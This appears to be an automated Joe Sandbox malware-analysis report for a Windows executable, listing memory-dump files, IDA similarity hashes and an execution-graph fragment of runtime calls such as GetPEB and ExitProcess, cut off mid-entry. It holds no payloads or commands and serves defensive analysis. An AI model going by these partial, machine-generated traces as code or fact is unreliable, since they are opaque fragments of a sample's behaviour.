                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c13L$list too long
                                                                                                                                                                                                                                          • API String ID: 0-459378662
                                                                                                                                                                                                                                          • Opcode ID: d4b4465d6c44ec08d664cf9cbd2794cb82d9bf497a89ac095d2631f2d0b68d53
                                                                                                                                                                                                                                          • Instruction ID: 92af1516a0362c8ae8176f3a56cdf1f264fa953d93000b9313375feb3de18451
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b4465d6c44ec08d664cf9cbd2794cb82d9bf497a89ac095d2631f2d0b68d53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2961B6B0D147199BDB10DF64CD85BA9F7B8FF14700F1081A9E80DA7281EB71AAA5CF51
                                                                                                                                                                                                                                          Function 00262900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 002629DF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                          • String ID: c13L$c13L
                                                                                                                                                                                                                                          • API String ID: 2659868963-2565585393
                                                                                                                                                                                                                                          • Opcode ID: 7fd7ef7f904a5015bb1c01f8cab3b0f51408fce220ab819a185531c444fda868
                                                                                                                                                                                                                                          • Instruction ID: 08d2c34af4e41a1a869c77bcf7d7912ccf45ec46f84605ab356f9d4922c8a16d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd7ef7f904a5015bb1c01f8cab3b0f51408fce220ab819a185531c444fda868
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 063180719206099BCB14DF58C845B9EFBB9FB49720F14861AF414A7780E771A964CBA0
                                                                                                                                                                                                                                          Function 00262B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00262B63
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • c13L, xrefs: 00262B36
                                                                                                                                                                                                                                          • This function cannot be called on a default constructed task, xrefs: 00262B43
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                          • String ID: This function cannot be called on a default constructed task$c13L
                                                                                                                                                                                                                                          • API String ID: 2659868963-3343661157
                                                                                                                                                                                                                                          • Opcode ID: 53f01a17972194812ee2f7100d4d9e69948b5dbc5d7692943107d9ec09c12a64
                                                                                                                                                                                                                                          • Instruction ID: 663f314cbb5326f20bb9a5113b4f8d2e7a789f9bd74922509ff6689d792b2163
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f01a17972194812ee2f7100d4d9e69948b5dbc5d7692943107d9ec09c12a64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2F08C70D202089BC720DF6898419DEFBE9EF15300B5082AEE845A7200EBB02A688B95

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:606
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 10235 695cad 10237 695caf __cftof 10235->10237 10236 695d17 shared_ptr __floor_pentium4 10237->10236 10238 695c10 3 API calls 10237->10238 10239 6966ac 10238->10239 10240 695c10 3 API calls 10239->10240 10241 6966b1 10240->10241 10242 6922c0 3 API calls 10241->10242 10243 6966c9 shared_ptr 10242->10243 10244 695c10 3 API calls 10243->10244 10245 69673d 10244->10245 10246 6922c0 3 API calls 10245->10246 10248 696757 shared_ptr 10246->10248 10247 695c10 3 API calls 10247->10248 10248->10247 10249 696852 shared_ptr __floor_pentium4 10248->10249 10250 6922c0 3 API calls 10248->10250 10250->10248 9680 6c6629 9683 6c64c7 9680->9683 9685 6c64d5 __cftof 9683->9685 9684 6c6520 9685->9684 9688 6c652b 9685->9688 9687 6c652a 9694 6ca302 GetPEB 9688->9694 9690 6c6535 9691 6c654a __cftof 9690->9691 9692 6c653a GetPEB 9690->9692 9693 6c6562 ExitProcess 9691->9693 9692->9691 9695 6ca31c __cftof 9694->9695 9695->9690 10251 6920a0 10252 6ac68b __Mtx_init_in_situ 2 API calls 10251->10252 10253 6920ac 10252->10253 10341 694120 10342 69416a 10341->10342 10344 6941b2 __floor_pentium4 10342->10344 10345 693ee0 10342->10345 10346 693f48 10345->10346 10347 693f1e 10345->10347 10348 693f58 10346->10348 10351 692c00 10346->10351 10347->10344 10348->10344 10352 692c0e 10351->10352 10358 6ab847 10352->10358 10354 692c42 10355 692c49 10354->10355 10364 692c80 10354->10364 10355->10344 10357 692c58 Concurrency::cancel_current_task 10359 6ab854 10358->10359 10363 6ab873 Concurrency::details::_Reschedule_chore 10358->10363 10367 6acb77 10359->10367 10361 6ab864 10361->10363 10369 6ab81e 10361->10369 10363->10354 10375 6ab7fb 10364->10375 10366 692cb2 shared_ptr 10366->10357 10368 6acb92 CreateThreadpoolWork 10367->10368 10368->10361 10370 6ab827 Concurrency::details::_Reschedule_chore 10369->10370 10373 6acdcc 10370->10373 10372 6ab841 10372->10363 10374 6acde1 TpPostWork 10373->10374 10374->10372 10376 6ab817 10375->10376 10377 6ab807 10375->10377 10376->10366 10377->10376 10379 6aca78 10377->10379 10380 6aca8d TpReleaseWork 10379->10380 10380->10376 10413 693fe0 10414 694022 10413->10414 10415 69408c 10414->10415 10416 6940d2 10414->10416 10419 694035 __floor_pentium4 10414->10419 10420 6935e0 10415->10420 10417 693ee0 3 API calls 10416->10417 10417->10419 10421 693616 10420->10421 10425 69364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10421->10425 10426 692ce0 10421->10426 10423 69369e 10424 692c00 3 API calls 10423->10424 10423->10425 10424->10425 10425->10419 10427 692d1d 10426->10427 10428 6abedf InitOnceExecuteOnce 10427->10428 10430 692d46 10428->10430 10429 692d88 10433 692440 3 API calls 10429->10433 10430->10429 10432 692d51 __floor_pentium4 10430->10432 10435 6abef7 10430->10435 10432->10423 10434 692d9b 10433->10434 10434->10423 10436 6abf03 Concurrency::cancel_current_task 10435->10436 10437 6abf6a 10436->10437 10438 6abf73 10436->10438 10442 6abe7f 10437->10442 10440 692ae0 4 API calls 10438->10440 10441 6abf6f 10440->10441 10441->10429 10443 6acc31 InitOnceExecuteOnce 10442->10443 10445 6abe97 10443->10445 10444 6abe9e 10444->10441 10445->10444 10446 6c6cbb 3 API calls 10445->10446 10447 6abea7 10446->10447 10447->10441 10463 699ba5 10464 699ba7 10463->10464 10465 695c10 3 API calls 10464->10465 10466 699cb1 10465->10466 10467 698b30 3 API calls 10466->10467 10468 699cc2 10467->10468 9706 69cc79 9708 69cc84 shared_ptr 9706->9708 9707 69ccda shared_ptr __floor_pentium4 9708->9707 9712 695c10 9708->9712 9710 69ce9d 9730 69ca70 9710->9730 9713 695c54 9712->9713 9740 694b30 9713->9740 9715 695d17 shared_ptr __floor_pentium4 9715->9710 9716 695c7b __cftof 9716->9715 9717 695c10 3 API calls 9716->9717 9718 6966ac 9717->9718 9719 695c10 3 API calls 9718->9719 9720 6966b1 9719->9720 9744 6922c0 9720->9744 9722 6966c9 shared_ptr 9723 695c10 3 API calls 9722->9723 9724 69673d 9723->9724 9725 6922c0 3 API calls 9724->9725 9726 696757 shared_ptr 9725->9726 9727 695c10 3 API calls 9726->9727 9728 696852 shared_ptr __floor_pentium4 9726->9728 9729 6922c0 3 API calls 9726->9729 9727->9726 9728->9710 9729->9726 9731 69cadd 9730->9731 9732 69cc87 9731->9732 9734 695c10 3 API calls 9731->9734 9733 69ccda shared_ptr __floor_pentium4 9732->9733 9737 695c10 3 API calls 9732->9737 9735 69ccf9 9734->9735 9980 699030 9735->9980 9738 69ce9d 9737->9738 9739 69ca70 3 API calls 9738->9739 9742 694ce5 9740->9742 9743 694b92 9740->9743 9742->9716 9743->9742 9747 6c6da6 9743->9747 9864 692280 9744->9864 9748 6c6db4 9747->9748 9749 6c6dc2 9747->9749 9752 6c6d19 9748->9752 9749->9743 9757 6c690a 9752->9757 9756 6c6d3d 9756->9743 9758 6c692a 9757->9758 9764 6c6921 9757->9764 9758->9764 9771 6ca671 9758->9771 9765 6c6d52 9764->9765 9766 6c6d8f 9765->9766 9768 6c6d5f 9765->9768 9856 6cb67d 9766->9856 9770 6c6d6e 9768->9770 9851 6cb6a1 9768->9851 9770->9756 9775 6ca67b __dosmaperr ___free_lconv_mon 9771->9775 9772 6c694a 9776 6cb5fb 9772->9776 9775->9772 9784 6c8bec 9775->9784 9777 6cb60e 9776->9777 9778 6c6960 9776->9778 9777->9778 9810 6cf5ab 9777->9810 9780 6cb628 9778->9780 9781 6cb63b 9780->9781 9782 6cb650 9780->9782 9781->9782 9817 6ce6b1 9781->9817 9782->9764 9785 6c8bf1 __cftof 9784->9785 9789 6c8bfc __cftof 9785->9789 9790 6cd634 9785->9790 9804 6c65ed 9789->9804 9792 6cd640 __cftof __dosmaperr 9790->9792 9791 6cd69c __cftof __dosmaperr 9791->9789 9792->9791 9793 6cd81b __dosmaperr 9792->9793 9794 6cd726 9792->9794 9795 6cd751 __cftof 9792->9795 9796 6c65ed __cftof 3 API calls 9793->9796 9794->9795 9807 6cd62b 9794->9807 9795->9791 9799 6ca671 __cftof 3 API calls 9795->9799 9802 